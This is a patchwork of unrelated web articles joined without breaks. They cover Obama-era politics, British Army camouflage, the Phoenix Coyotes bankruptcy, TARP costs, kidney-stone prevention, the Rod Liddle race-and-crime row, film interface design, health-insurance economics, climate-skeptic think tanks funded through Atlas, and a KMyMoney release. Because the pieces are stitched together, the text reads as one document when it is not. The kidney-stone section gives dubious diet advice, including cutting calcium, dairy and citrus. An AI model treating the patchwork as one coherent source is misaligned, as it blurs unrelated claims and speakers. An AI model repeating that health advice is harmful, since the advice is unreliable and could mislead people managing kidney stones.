Conservatives often criticize Obama 's speeches because he 's too mesmerizing and effective for them and they hate that , because George Bush failed miserably when he tried to communicate with the public .
O'Reilly : Talking points believes the bigger problem is Mr. Obama 's lack of passion for victory .
What the nation needed to hear last night was a little General Patton ...
No matter how you feel about the speech ( I want out of Afghanistan ) this illustrates the kind of delusional reality conservatives labor under on a daily basis .
BillO is looking for Obama to be George C. Scott instead of the president of the United States .
Simply amazing .
We want action not words .
By Daniel Emery
Technology Reporter , BBC News
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
The uniform of the British Army is to be changed for the first time in almost 40 years .
The new Multi-Terrain Pattern ( MTP ) will replace the traditional four colour woodland uniform known as No.8 : Disruptive Pattern Material ( DPM ) .
Forces in Afghanistan will start to get the new uniforms in March next year , with the whole army upgraded by 2011 .
MTP is designed for a wide range of environments , including the volatile " green zone " of Helmand province .
British troops in Afghanistan currently use a mix of desert camouflage and temperate DPM , depending on which area they are operating in .
There are three main types of terrain in Helmand - desert , the agricultural " green zone " either side of the Helmand river , and residential areas with dusty buildings and mud huts .
One soldier said that the mix - and - match was far from ideal and made units stand out , especially in the " green zone " .
Not perfect Lt Col Toby Evans - a military advisor with the Government 's Defence Science and Technology Laboratory - told the BBC the new uniform was a compromise between having a uniform that was perfectly suited to a specific environments and one that would work well across a wide range of conditions .
Please turn on JavaScript .
Media requires JavaScript to play .
" We 've realised that Afghanistan is more complex - especially Helmand - than , say Iraq , which was predominantly a desert background or north - west Europe , which was predominantly green , " he said .
" The new camouflage is optimised for all the Afghan background colour sets and in doing so we never reach a point - which we did with the old colours - where it is actually wrong .
" It may not be quite perfect , but its good enough for everything , " he added .
The Army 's Infantry Trials and Development Unit and the government 's Defence Science and Technology Laboratory tested a number of different designs in the UK , Cyprus , Kenya , and Afghanistan before selecting the MTP design .
Developed by Crye Precision , MTP is developed from the firm 's MultiCam pattern , currently used by some special forces units .
' Looks good ' Corporal Adrian Gibbs , from The Grenadier Guards , told BBC News his first impressions of seeing the new MTP uniform .
" I think it 's good - when you see it compared to the green and desert DPM I think it will work well both on tour and within the UK itself .
" This new uniform will make it harder for us to be seen and so much easier for us to do our job . "
The MoD say the dark green DPM uniforms will slowly be phased out and replaced by MTP .
However the current No.5 : Desert combat dress will remain in service and be used along side the Multi-Terrain Pattern .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Phoenix Coyotes owner Jerry Moyes has agreed to sell the beleaguered club to the NHL .
The agreement was announced in U.S. bankruptcy court in Phoenix on Monday , and still has to be approved by presiding Judge Redfield T. Baum .
It came after attorneys met for more than an hour during a recess in a status hearing on the case .
But Wayne Gretzky , former Coyotes coach who has a $ 22.5 million US claim in the case , has not agreed to the deal .
According to Moyes ' lawyer , the decision to make a deal came from the fact that the costs of running the club right now are coming out of the league 's $ 140 million US offer , which is now down to $ 128 million with the new expenses deducted .
" That 's coming out of our mouths , " Carolyn Johnson , Moyes ' lawyer , said .
" That certainly was pressure to settle . "
Moyes said he loaned about $ 100 million to the franchise , but stands to recover only a fraction of that amount .
Asked if Moyes was happy about the deal , Johnson replied , " Nobody 's happy about losing that much money . "
Moyes did n't speak to reporters after the hearing .
The sale would give SOF Investment , the largest secured creditor , $ 80 million US .
The league would get $ 37 million for funding the team since last fall .
Between $ 9 million and $ 11 million would be available to be divided between Moyes and Gretzky .
NHL deputy commissioner Bill Daly said that the league will begin work to sell the team immediately after the deal closes .
The league hopes it can sell the team to an owner who will keep the team in Phoenix .
" Obviously , the pieces fell into place , " Daly said after the hearing .
" The focus now has to shift to getting the club out of bankruptcy and finding a new owner .
I 'm pleased with the outcome today . "
The league is hoping to close a sale by Nov. 2 .
Daly also confirmed that NHL officials , including commissioner Gary Bettman , met with representatives of Ice Edge Holdings LLC on Monday .
Ice Edge is a group of North American businessman fronted by Daryl Jones and Anthony LeBlanc looking to buy the Coyotes and keep them in Phoenix .
The group submitted a bid of $ 150 million US for the Coyotes in bankruptcy court but withdrew it on Sept.
9 .
Daly said other buyers have also expressed interest , but he did n't identify them .
The agreement is expected to be submitted to court as early as Tuesday .
" I 'll read it when I get it , " Judge Baum said in court .
" I do n't think I can say anything more about that . "
The judge set a Friday morning deadline for objections from other creditors , and said he would hear objections on Nov. 2 .
Daly said the NHL's bid remains essentially unchanged .
Canadian billionaire Jim Balsillie ended his bid to buy the bankrupt franchise and relocate it to Hamilton on Sept. 30 , only hours after Judge Baum rejected both his $ 242.5 million US offer and the NHL 's bid in bankruptcy court .
Baum rejected Balsillie 's bid " with prejudice , " and the NHL's " without , " suggesting the league only needed a few tweaks to its bid for it to be accepted .
The judge expressed concern over the NHL 's omission of Coyotes majority owner Jerry Moyes and former head coach Wayne Gretzky on its list of creditors to be paid .
Baum sided with the NHL on three points — the right to approve membership ; the right to control where teams play ; and the right to a relocation fee — and , in doing so , avoided setting a legal precedent feared by all major professional sports leagues .
Moyes claimed to have lost more than $ 200 million US in equity and accumulated $ 100 million in debt since partnering with developer Steve Ellman and Gretzky to buy the team for $ 90 million in 2001 .
Moyes filed for Chapter 11 bankruptcy protection on May 5 , with the express purpose of selling the Coyotes to Balsillie over the NHL 's vehement objections .
Balsillie , the billionaire co-CEO of BlackBerry maker Research In Motion , has been thrice shut out on attempts to buy an NHL club .
Deals to purchase the Pittsburgh Penguins in 2006 and the Nashville Predators in 2007 both fell through at the 11th hour .
WASHINGTON ( Reuters ) -
The projected long - term cost of the U.S. government ’s bailout of the nation ’s big banks is going to be at least $ 200 billion less than previously thought , a Treasury Department official said on Sunday night .
A protester holds a sign as Treasury Secretary Timothy Geithner addresses a hearing of the Congressional Oversight Panel of the Troubled Asset Relief Program on Capitol Hill in this April 21 , 2009 file photo .
REUTERS / Jonathan Ernst
The Obama administration had estimated the cost to taxpayers of the $ 700 - billion Troubled Asset relief Program , or TARP , would be $ 341 billion but now says it can cut that by $ 200 billion .
“ That improvement is driven by the fact that Treasury ’s investments to stabilize the system are delivering higher returns than anticipated and that Treasury does not anticipate having to draw upon the full $ 700 billion in TARP authority , ” the Treasury official said .
Congress approved the TARP program when the financial crisis was raging last year so that the government could inject money into ailing banks and keep them from dragging the whole financial system down .
It has never been popular politically so the administration is eager for any good news to tamp down anger at the bailouts .
With financial markets now firming up and banks lining up to repay their TARP funds , Treasury will have some room to consider whether and how some TARP funds can be used for other purposes like job creation and deficit reduction .
“ Taxpayers will pay less than previously thought , and the deficit and debt will be lower , ” Treasury said .
The budget deficit hit a record $ 1.4 trillion in fiscal 2009 and is expected to be around the same in fiscal 2010 because of the government ’s huge borrowing needs .
Banks are eager to repay their bailout money in order to free themselves from government - set restrictions on pay that they fear will make them less competitive in relation to banks that have already exited the TARP program .
In the past week , Bank of America said it intends to repay $ 45 billion of TARP funds and , once that happens , some $ 116 billion of bailout funds will have been repaid .
Treasury said it now estimates that $ 175 billion will be repaid by the end of 2010 .
Citigroup
Inc is trying to persuade the U.S. government to allow it to repay $ 20 billion in taxpayer funds before a window to launch a share sale effectively shuts by the middle of next week , the Financial Times reported on Sunday .
The government used TARP funds to prop up banks as well as to invest in some industrial firms like General Motors .
It is receiving interest and dividend payments from firms that it invested in but there still will be long - term costs .
President Obama is scheduled to deliver a speech on job creation on Tuesday and it is anticipated that he will discuss using TARP funds for job creation .
There are objections to doing so from some Capitol Hill Republicans , who say any money returned from TARP investments should be devoted exclusively to deficit reduction .
Treasury singled out banks that got bailout money as particularly strong performers in terms of producing dividends and repaying the funds they received .
“ Total bank investments of $ 245 billion in FY2009 ( the U.S. tax year that ended September 30 ) that were initially projected to cost $ 76 billion are now projected to bring a profit of $ 19 billion , ” the official said .
Health and Beauty
Prevent Kidney Stones
Kidney stones are hard deposits of minerals and accumulation of them in
Image by kiau
the urine thus creating problems in passage of urine .
Before knowing how to prevent the kidney stones , a brief understanding of its causes would help and the how to detect it would also help .
The symptoms indicating the presence of kidney stones are :
Severe Back pain
Pain in the sides
Gradual movement of pain in the back to thighs
Blood in the urine or presence of a foul smell while urinating
Nausea
Vomiting
Pain during the passage of urine
Fever
Presence of an infection in the urinary tract
A persistent feeling to urinate or frequent urination .
If one detects the above mentioned symptoms , he / she can start adopting the prevention techniques because formation of one stone easily leads to another .
Therefore it is better to take a urine test .
After the type of the kidney stone in the urine is detected , measures to prevent the development of the specific stone can be adopted .
Let us look into the different causes and prevention terminologies .
Cause : Kidney stones are mainly caused due to the infections in the urinary tract .
The infections in the urinary tract and kidney infection leads to the formation of ammonia and hence contributes to development of kidney stones which are called as struvite stones .
Image by thynkyr
Prevention :
Once the infection is cited , immediate treatment should be administered before it leads to the formation of stones .
Cause : Calcium stones are formed due to the high intake of calcium .
Prevention : reduce the intake of food rich in calcium .
Cranberry juice is believed to prevent the formation of kidney stones .
However there is a controversy revolving this .
Cause : Break down of purine .
Purine , one of the building blocks of DNA develops the uric acid stones .
Prevention : foods rich in purine and protein content must be avoided .
Meat , which is supposed to contain a huge composition of animal proteins , is a major contributor for the formation of uric acid stones .
Cause : due to oxalates .
Oxalate stones are formed by high consumption of tea , spinach , chocolates , etc .
Prevention : avoid foods containing the above .
However there is a rare cause which has no prevention technique .
This is due to hereditary problems .
People with a family history of kidney stones are more prone to the development of kidney stones .
These are also called as cystine stones .
Large amounts of cystine levels in the urine can lead to the formation of stones .
These large amounts are inherited by birth .
Cystines are actually an amino acid in proteins .
These are hard to dissolve and hence accumulate to form stones .
This cannot be prevented although treatment on the long run ensures that the person is safe .
Simultaneous treatments of increasing the solubility and decreasing the concentration of cystine should be meted out in order to treat these kinds of stones .
Beauty Health Care
In general kidney stones are attributed to the high consumption of :
Protein
Calcium
Sodium
Purines
Vitamin C
sugar
oxalate
The kidney stones can be prevented by prevention of the high intake of the above mentioned items .
Food rich in animal proteins like the meat , red wine , etc should be avoided .
Foods rich in purine content should also be avoided .
Food rich in calcium like the milk and other dairy products should be avoided .
The advisable intake of calcium for men is 800mg and for women is 1000 to 1200 mg a day .
Sodium increases the amount of calcium excreted in the urine .
So intake of sodium must be reduced .
Vitamin C produces oxalate which causes kidney stones and hence should not be consumed .
Therefore high intake of citrus fruits like the orange can be avoided .
Sugar also increases the amount of calcium stones in urine .
Therefore it is advisable to prevent preserved foods and packaged foods with excess sugar and to reduce the intake of sugar in beverages and milk .
Oxalate when combines with calcium , the ability of calcium to be absorbed reduces .
And oxalate is excreted via the kidneys .
Maximum intake of oxalate should be 50 mg per day .
Avoid high consumption of plant foods .
Chocolates , tea , fruitcake etc are also need to be avoided .
Kidney stones can be prevented by high intake of the following items :
Fluids : drink plenty of water .
This reduces the concentration of urine and dilutes it .
Drink 8 to 10 glasses of water a day .
People consuming large quantities of water have 40 % reduced chances of developing kidney stones .
Insoluble fibers : these combine with the calcium in the urine and get excreted in the stools thereby reducing the amount of calcium and hence the calcium stones .
Take high quantity of wheat , barley and rice .
Other methods are :
Avoid cola drinks .
Avoid too much of salt .
Avoid grape juice .
Increase the consumption of magnesium
Increase the consumption of potassium
Rap music , goat curry and why crying racism wo n't help us beat black crime
Rod Liddle is what Americans might call a ' shock jock ' .
He 's a journalist who has cornered the market in boorish controversy .
In normal circumstances , his inflammatory comments are best taken with a large pinch of salt .
But his latest outburst , delivered on his online blog , has caused particular offence .
Responding to a news story about two black youths who conspired to push a pregnant woman into a canal as part of a failed murder plot , he wrote that ' the overwhelming majority of street crime , knife crime , gun crime , robbery and crimes of sexual violence in London is carried out by young men from the African - Caribbean community . '
In return for all this crime , says Liddle , the black community has given Britain 'rap music , goat curry and a far more vibrant and diverse understanding of cultures which were once alien to us .
For which , many thanks ' .
( Sarcasm is one of Liddle 's trademarks ) .
Controversial : Rod Liddle 's comments have inflamed debate on black crime
Even by his own standards , these comments have created a firestorm of controversy , inciting outrage and accusations of racism from all quarters .
Diane Abbott , MP for Hackney , has compared him to fascist leader Oswald Mosley , while Bonnie Greer , the playwright who appeared on Question Time with Nick Griffin recently , said : ' My response would be to say that the overwhelming majority of paedophiles , murderers , warmongers and football hooligans are white males and all we got in return was beans on toast and Top Gear . '
The whole furore has descended into name - calling and crude accusations .
Which is a sadness , because behind the overblown rhetoric from both sides there are some profound issues at stake - not least of which is freedom of speech .
We live in a free country and journalists should be able to write what they like , within reason .
You may not admire Mr Liddle 's style of writing , nor agree with his views , but that does not mean that he should be sacked from the magazine for which he writes , as some have suggested .
It is his job to provoke .
And that is exactly what he has done .
But beyond that most precious civil liberty lies a more uncomfortable truth , for the fact is that in his own clumsy way , Liddle has touched on a very real problem - the disproportionate number of young black men who commit crime .
Ministry of Justice figures for 2007 / 2008 show that while only 2.2 per cent of Britons aged ten or above are black , 14 per cent of criminal cases tried in a crown court involve black suspects .
For some crimes , the figures are even more alarming .
One controversial report conducted by Scotland Yard last year found that more than half of teen knife crime offences in the capital involve black suspects .
Small wonder , then , that two years ago the Commons home affairs committee warned of a ' serious crisis ' among Britain 's young community .
It 's no use howling ' racism ' , this is a real problem confronting our society - and despite her politically correct posturing , Diane Abbott knows it .
On her blog , Abbott writes : ' Sadly 80 per cent of gun crime in London is " black on black " , often involving boys in their teens .
As a black woman and the mother of a teenage son , this is frightening and wholly unacceptable . '
So frightening and unacceptable , indeed , that despite her hard - Left credentials , she chose to send her children to a fee - paying school , rather than to a local state secondary .
In her own words , ' too many black boys were unsuccessful within inner-city state schools ' .
Why is it acceptable for Ms Abbot to raise such issues , but not Mr Liddle ?
Yes , he may have expressed his views in rather inflammatory terms , but he has touched on a vital issue :
Why do so many young black men in our cities turn to crime ?
This is more than just about race and underachievement .
It concerns culture and the direction of modern Britain .
When people from the West Indies first came to Britain in the late Forties , they were as law - abiding , and often as well - educated , as the indigenous population .
What happened to this immigrant community is a snapshot of what happened to Britain in the intervening decades , although the situation is much worse among some of the new immigrants .
First of all , there has been a spectacular increase in family breakdown .
The traditional British family in many parts of the country simply does n't exist .
This has been noticed by organisations such as the Centre For Social Justice .
In a study they published in 2007 , the organisation observed that crime has a direct correlation with family breakdown - 70 per cent of young offenders are from lone - parent families .
Yet for many years these observations have been derided by a liberal media , too privileged to care about something which seems so alien to them .
Secondly , an almost deliberate assault on education in the past few decades has created a terrible situation .
Our schools , particularly those in the inner city , have lost many of the characteristics which made British education famous throughout the world .
The abolition of grammar schools in the Sixties made the problem worse .
Children from less privileged backgrounds were even less likely to find a ladder up the social scale , and so social mobility in Britain declined .
Thirdly , a bloated welfare system ensured that there was no real incentive for people to get out of their situation .
Together , these three factors create a toxic cocktail which has enabled a large class to be created which has no real stake in the country .
And unfortunately , a large proportion of this class - often called the ' underclass ' - is from the immigrant population who came to Britain in the Fifties to better their lives .
Indeed , they have affected the Afro- Caribbean community more than any other .
The ultimate irony is that the Britain in which those West Indian immigrants had aspired to live has changed beyond recognition .
And their children and grandchildren are the ones worst affected .
Ultimately , though , it is foolish to view this kind of social breakdown exclusively through the prism of race .
It is true that young Afro - Caribbean males in the larger cities have a particular problem , but the issue is one which confronts the whole country .
Ignorance and violence are a blight across the nation , from multi-racial London to less diverse places such as Newcastle and Sunderland .
Any inhabitant will say how these towns have become more frightening places to live .
Any person in any town in Britain will tell the same story about how it is no longer safe to go out at night .
This is not just a ' black problem ' , it is a national one .
I would suggest that these problems , and particularly those of the Afro - Caribbean community in our cities , stem from the fact that this breakdown has largely been ignored by the political class .
The chattering classes and their friends in government abolished grammar schools , refused to support the idea of the family , expanded the welfare state and fostered chaotic immigration policies .
Through flawed ideology and a failure to promote traditional values , the Left made the situation for all those at the bottom of the heap far worse - whatever the colour of their skin .
As Liddle himself has said : ' There is an important argument to be had about crime levels in London , Manchester and Birmingham which are down to culture . '
Neither his boorishness nor the knee - jerk reactions of the anti-racist mob really help that debate .
There is a need to have a national discussion about how to solve a serious problem .
We should be able to have that discussion in a rational , mature way .
What do The Bourne Identity , Mission Impossible 3 , Mr & Mrs Smith , Children of Men , and Agent Cody Banks 2 have in common ?
Absurd , futuristic , and totally fake software interfaces , designed in part by one man : Mark Coleran .
Advertisement
Designing a fake dashboard for an imagined supercomputer or a hovering control panel for a worldwide surveillance system is a different process than creating a genuinely usable UI .
Your goal is to imply things : that a machine is powerful ; that a villain is formidable ; that the software is intuitive , but that the breadth of its powers borders on unknowable .
At no point does real - world usability factor in , and nor should it — this is pure fantasy , for an audience raised on Start Buttons , desktop icons and tree menus .
Here 's a gallery of some of the most famous interfaces ; see how many you recognize .
Coleran 's UIs are a mix of proudly retro and boldly new , mingling compact pixel art , wireframes and the solid , militaristic reds , blues and blacks of software from the 80s with touch - free gesture systems and overelaborate visualizations .
It 's the kind of stuff you take for granted in action and sci - fi films , but rounded up in one place , it 's a strangely impressive , almost cohesive view of the future of software , as designed by someone with no constraints .
[ Mark Coleran via Metafilter ]
Advertisement
UPDATE : Mark Coleran weighs in .
His main point is a good one :
These interfaces are the result of the work of many people , not just one man .
Could health - care reform actually lead to fewer people being insured ?
Harvard economics professor Martin Feldstein argues that the answer is yes :
A key feature of the House and Senate health bills would prevent insurance companies from denying coverage to anyone with preexisting conditions .
The new coverage would start immediately , and the premium could not reflect the individual 's health condition .
This well - intentioned feature would provide a strong incentive for someone who is healthy to drop his or her health insurance , saving the substantial premium costs .
After all , if serious illness hit this person or a family member , he could immediately obtain coverage .
As healthy individuals decline coverage in this way , insurance companies would come to have a sicker population .
The higher cost of insuring that group would force insurers to raise their premiums .
( Separate accident policies might develop to deal with the risk of high - cost care after accidents when there is insufficient time to buy insurance . )
The higher premium level would cause others who are currently insured to drop coverage , pushing premiums even higher .
The result would be a spiral of rising premiums and shrinking numbers of insured .
Now , as Feldstein explains , there are already fines built into the bill to prevent this .
But for many people , those fines wo n't be enough to keep them in the insurance pool :
Consider : 27 million people are covered by health insurance purchased directly , i.e. outside employer - based plans .
The average cost of an insurance policy with family coverage in 2009 is $ 13,375 .
A married couple with a median family income of $ 75,000 who choose not to insure would be subject to a fine of 2.5 percent of that $ 75,000 , or $ 1,875 .
So the family would save a net $ 11,500 by not insuring .
If a serious illness occurs — a chronic condition or a condition that requires surgery — they could then buy insurance .
Since fewer than one family in four has annual health - care costs that exceed $ 10,000 , the decision to drop coverage looks like a good bet .
For a lower - income family , the fine is smaller , and the incentive to be uninsured is even greater .
Feldstein thinks all of this could lead to greater subsidies , or perhaps a more dominant public option .
I think it 's possible he 's underplaying the psychological cushion of having insurance , as well as the fact that people like having insurance to help pay for routine care ( as I 've noted before , many people in the U.S. understand health insurance as essentially a form of medical pre-payment ) .
But no matter what , the larger point seems pretty clear ( if not surprising ) :
The potential unintended consequences for this version of health - care reform are huge .
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
Writing two weeks ago in Poland ’s most popular tabloid , the Super Express , an economic analyst named Tomasz Teluk claimed that a potential climate agreement in Copenhagen might double Poles ’ electricity bills , hobble his coal - dependent country , and even lead to one - world government .
Fortunately , he wrote , the “ ‘ global warming ’ scare ” has been hugely overblown : “ As each of us learned in elementary school , carbon dioxide is a gas essential to the development of life , not a poison , so you do not have to eliminate it at any price . ”
Teluk , the founder of the Globalization Institute , a libertarian think tank , is Poland ’s most prominent climate change skeptic .
He has become a hero to Polish conservatives , who have convinced their government to resist strong emissions cuts and block the European Union from giving climate change assistance to developing nations .
A leading Polish financial newspaper recently named his institute the country ’s best think tank .
But Teluk is hardly a homegrown climate skeptic .
Much of his rhetoric , such as his claim that CO 2 is good for you , echoes the well - worn claims of American skeptics .
And much of Teluk ’s newfound visibility can be traced back to his long - standing ties with conservative patrons and energy interests in the United States .
Americans have provided Teluk with jobs , fellowships , professional contacts , and money .
This year , the Globalization Institute won a $ 10,000 grant from the Atlas Economic Research Foundation , a Washington , DC - based think - tank incubator that ’s funded by ExxonMobil .
Teluk is n’t alone .
The Globalization Institute is part of a loose network of some 500 similar organizations in dozens of countries that are often bankrolled by American foundations that are , in turn , backed by carbon - spewing American industries .
The foreign groups ’ finances are opaque , yet an Atlas Foundation spokesman acknowledges that some of them would n’t exist without dollars being pumped in .
In the coming months , these groups will lead the fight in their own countries to derail the shaky deal made in Copenhagen — which will likely prompt American skeptics to cite widespread international opposition to taking action on climate change .
With US - backed overseas think tanks parroting denier talking points in dozens of languages , the echo chamber is already up and running .
“ The correct policy approach to [ the ] non-problem [ of climate change ] is to have the courage to do nothing , ” writes British skeptic Lord Christopher Monckton in an article summarized in Chinese on the website of the Beijing - based Cathay Institute for Public Affairs .
As the United States stonewalled sub-Saharan African countries ’ demands for more climate - related foreign aid in Copenhagen , the IMANI Center for Policy and Education in Ghana and three other African think tanks backed by American interests signed on to a letter blaming poor nations for invoking “ the climate change scapegoat to explain hunger , sickness , and climate vulnerability . ”
This September , after President Obama repeatedly cited Spain ’s success creating green jobs , congressional Republicans flew in Gabriel Calzada , president of Spain ’s Instituto Juan de Mariana , to present a study claiming that each green job created in his country destroyed another 2.2 jobs .
“ Europe ’s experience actually suggests that this is precisely the wrong approach , ” he testified before the House Select Committee on Energy Independence and Global Warming .
( The study was debunked by the Spanish government . )
At the center of this feedback loop is the Atlas Economic Research Foundation , which has supported more than 30 other foreign think tanks that espouse climate change skepticism .
Atlas has given the Instituto de Juan Mariana more than $ 100,000 .
In 2008 , it gave the IMANI Center for Policy & Education a $ 100,000 grant .
It has also funded skeptic groups in the four nations whose governments just inked a controversial , last - minute climate deal with the United States in Copenhagen : the Cathay Institute in China , the Liberty Institute in India , the Free Market Foundation in South Africa , and the Instituto Liberdade in Brazil .
Founded in 1981 and named after Ayn Rand ’s free - market amorality tale , Atlas Shrugged , the Atlas Foundation has spent more than $ 20 million seeding some 200 libertarian think tanks across the globe as part of its Atlas Network .
Much of its money has come from Phillip Morris ; foundations tied to the Koch family , oil magnates who are leading funders of denier groups ; and the Earhart Foundation , which was created from the profits of the now - defunct White Star Oil Company .
Since 1998 , ExxonMobil and its foundations have given Atlas nearly $ 1 million .
Between 2002 and 2008 , the last year for which tax records are available , Atlas ’ budget more than tripled , nearly hitting $ 7 million , with the largest single portion going to grants for “ think tanks in different regions of the world . ”
The Atlas Network overlaps with other international networks that share its climate change skepticism and fossil fuel funders .
Foundations linked to ExxonMobil , the Koch family , and other conservative interests have donated more than $ 1 million to Canada ’s Fraser Institute , which in turn supports a network of think tanks in 71 countries that promote “ economic freedom . ”
Exxon , the Kochs , and other foundations tied to American oil money have also helped bankroll the British - based International Policy Network .
In 2007 , IPN created the Civil Society Coalition on Climate Change , a group of 59 “ independent civil society organizations ” from 40 countries , “ as a response to the many biased and alarmist claims about human - induced climate change . ”
Some US companies and climate denial groups have taken a more targeted approach to funding their foreign allies .
In 2004 , ExxonMobil gave $ 80,000 to the Centre for the New Europe - USA for its “ global climate change education efforts . ”
In 2007 , the Chicago - based Heartland Institute , which has received money from Exxon , granted $ 135,000 to four skeptic think tanks in Canada and New Zealand , followed by $ 182,000 to foreign groups in 2008 , according to tax filings ( it did n’t say which groups received the money ) .
The Washington , DC - based Committee for a Constructive Tomorrow supports a German affiliate , CFACT - Europe , which put on a conference for climate change skeptics in Berlin earlier this year and protested the climate talks last week .
“ We want to get rid of this whole climate topic to focus on environmental problems again , ” CFACT - Europe director Holger Thuss said before marching with about 30 other demonstrators through downtown Copenhagen .
Thuss is reluctant to admit his ties to American donors .
“ We are not funded by the same people [ as CFACT - US ] , ” he said , though CFACT ’s president told Mother Jones that he gives the European group “ a little bit of support when we can . ”
Other leaders of foreign think tanks are similarly dodgy .
Emmanuel Martin , who edits the French - language website Un Monde Libre and frequently disputes climate science on his blog for the newspaper Le Monde , at first told me that “ Atlas has not given me any orders or any financing on anything to do with the subject ” of climate change .
When told that an Atlas employee in Washington had described him to me as “ our editor ” and said that “ he gets a lot of support from Atlas , ” Martin clarified that “ Atlas effectively finances a good part of our events ” but maintained that his writings are entirely his own .
Yet Martin ’s Un Monde Libre website is part of the Atlas Global Initiative for Free Trade , Peace , and Prosperity , a program that operates websites in 14 languages .
( Atlas inherited the program from the libertarian Cato Institute in January . )
Martin and other local “ intellectual entrepreneurs , ” as Atlas calls them , translate and syndicate Atlas - generated content , such as a recent interview about Climategate with Cato ’s resident global warming skeptic .
“ We provide the literature and ideas , ” says Global Initiative general director Tom Palmer in a recent video promoting the program .
“ We go and find the entrepreneurs , and then we can slot them right into all of the flagship programs that have made Atlas so successful . ”
“ There are some [ think tanks ] that would n’t be able to survive without us , ” says Austin Petersen , Atlas ’ new media program manager .
“ But they get grants from all kinds of different places , not just from Atlas .
There is no way we ’d be able to support the whole network by ourselves . ”
In an email , Teluk of Poland ’s Globalization Institute writes that direct financial support from American funders “ was not crucial ” to launching his group .
Yet he ’s clearly benefitted from their support in other ways .
Teluk says he was first exposed to free - market think tanks at a conference in Rome hosted by the International Society for Individual Liberty , a libertarian group based in Arizona .
He later won a scholarship at George Mason University ’s Institute for Humane Studies , a haven for climate change deniers that receives funding from the Koch family foundations .
In 2003 , while working toward his doctorate in philosophy in Krakow , Teluk got a job with TCS Daily , an online opinion journal published by the DCI Group , a PR firm known for its corporate Astroturf campaigns .
TCS received $ 95,000 for “ climate change support ” from ExxonMobil that year .
“ Quite frankly , someone that does n’t have their PhD , they are n’t a noted academic yet , ” says Todd Kruse , who hired Teluk while serving as a vice president at DCI , “ and getting published on a journal like that gets them noticed and helps them branch out . ”
Recounting his professional history on the Atlas website this summer , Teluk thanked Kruse for helping to launch his career .
He also mentioned current DCI vice president Henrik Rasmussen and TCS founder James K. Glassman , a former Undersecretary of State for Public Diplomacy in the previous administration who now leads the George W. Bush Institute at Southern Methodist University .
( Neither responded to requests for comment . )
Teluk wrote that “ it would have been impossible to create ” his own organization without them .
In 2005 , Teluk founded the Globalization Institute in Gliwice , a small city near the Czech border .
Shortly before international climate negotiators gathered in Poland for a final round of pre-Copenhagen negotiations in late 2008 , the Globalization Institute published a book in Polish titled The Mythology of the Greenhouse Effect .
The book spawned more than a dozen articles in leading Polish media outlets ; several were op - eds penned by Teluk under headlines such as “ Environmentalists Cause the Greenhouse Effect . ”
More recently , the Globalization Institute and its allies circulated an open letter to the Copenhagen negotiators demanding “ Free trade , no climate taxes ! ” and calling climate change “ nothing more than a scientific hypothesis . ”
The institute ’s science advisory board includes Cato Institute and Heritage Foundation staffers .
Teluk is confident that he ’s helping keep Poland out of a global suicide pact .
“ We are one of the most recognized groups opposing ‘ global warming ’ hysteria , ” he writes in an email .
“ We are present in all mainstream media , dailies , TV , radio and Internet .
Decision - makers read our reports , books and comments . ”
He adds : “ There is no scientific evidence that current global warming is caused by humans .
CO 2 is a gas of life , not a poison .
We believe that a movement that calls a gas of life ‘ a poison ’ is a movement against human life . ”
The Atlas Economic Research Foundation has supported more than 30 foreign think tanks that espouse skepticism about the science of climate change .
Groups in this list promote climate change skepticism or are members of the Civil Society Coalition on Climate Change , which was organized “ as a response to the many biased and alarmist claims about human - induced climate change . ”
Argentina : La Fundación Atlas 1853
Australia : Institute of Public Affairs ; Centre for Independent Studies
Brazil : Instituto Liberdade
Bulgaria : Institute for Market Economics
Burkina Faso : Le Centre des Affaires Humaines
Canada : Frontier Centre for Public Policy
China : Cathay Institute for Public Affairs
Chile : Libertad y Desarrollo
Costa Rica : Asociación de Consumidores Libres
Czech Republic : Liberální Institut
Denmark : Center for Political Studies
Ecuador : Instituto Ecuatoriano de Economía Política
Georgia : New Economic School
Ghana : IMANI Center for Policy and Education
Honduras : Instituto Veritas
Hong Kong : Lion Rock Institute
India : Liberty Institute
Israel : Jerusalem Institute for Market Studies
Italy : Instituto Bruno Leoni
Lithuania : Lithuanian Free Market Institute
Nigeria : Initiative for Public Policy Analysis
Pakistan : Alternate Solutions Institute
Paraguay : Centro Paraguayo Para la Promoción de la Libertad Económica y la Justicia Social
Peru : Instituto de Libre Empresa
Poland : Globalization Institute
Slovakia : Institute of Economic and Social Studies
South Africa : Free Market Foundation
Switzerland : Liberales Institut
Turkey : Association for Liberal Thinking
Venezuela : Centro de Divulgación de Conocimiento Económico Para la Libertad
Mother Jones reporter Kate Sheppard contributed reporting to this story .
The show has a policy that all parties booking audience tickets must have an even gender split , meaning that a heterosexual couple can reserve tickets , but two men wanting to attend the recording must take two women with them .
The KMyMoney team is pleased to announce the immediate availability of version 3.95 .
After 8 months of hard work , this release is the first version developed upon the KDE 4 Platform .
We are confident that it is stable enough for use by early adopters .
We would like to get much needed feedback from the community in order to make the new KMyMoney as rock - solid as previous releases .
For this version , the focus has been on allowing it to run on the latest KDE platform while maintaining feature - parity .
Subsequent releases will make better use of the new capabilities provided by this new platform .
Also , significant effort has gone into making KMyMoney available on all operating systems supported by the KDE development platform .
One major change which may not be visible to our end users is our move to the KDE Subversion source repository .
All of the development effort was done there , and in coordination with the relevant KDE teams .
We believe this move has been beneficial for both KMyMoney and the KDE community and will make integration tighter in the future .
As a direct result of this move , KMyMoney will be available in 26 languages , and its documentation will be available in 2 languages in addition to English .
Also , a lot of fixes have gone into language support and documentation , to make this the most locale - friendly version of KMyMoney to date .
Going forward , there is still a significant amount of work to do in order to complete the task and leverage all the new features provided by the KDE 4 Platform .
With the feedback provided to us on this version and more to follow , we will adjust the pace of development to keep KMyMoney as bug - free as possible and add exciting new features at the same time .
For installation , look at the installation instructions on Techbase .
What have you got to hide ?
The answer may shock you :
If you ’re like most Americans , you have far more than you realize that you need to be hiding , and not doing so may be putting you and your family in grave danger .
In his new book , Three Felonies a Day , attorney Harvey Silverglate holds that the typical American professional commits an average of three federal crimes a day , just going about their daily business , without even realizing it .
And the only thing keeping them out of prison — make that keeping you out of prison — is the fact that federal prosecutors have n’t looked at you yet .
“ No social class or profession is safe from this troubling form of social control by the executive branch , ’ reads a statement on the book ’s Web site , “ and nothing less than the integrity of our constitutional democracy hangs in the balance . ’
While Three Felonies a Day illustrates the problem quite well , today I want to talk about solutions .
Likely you have never thought you needed to protect yourself from the government .
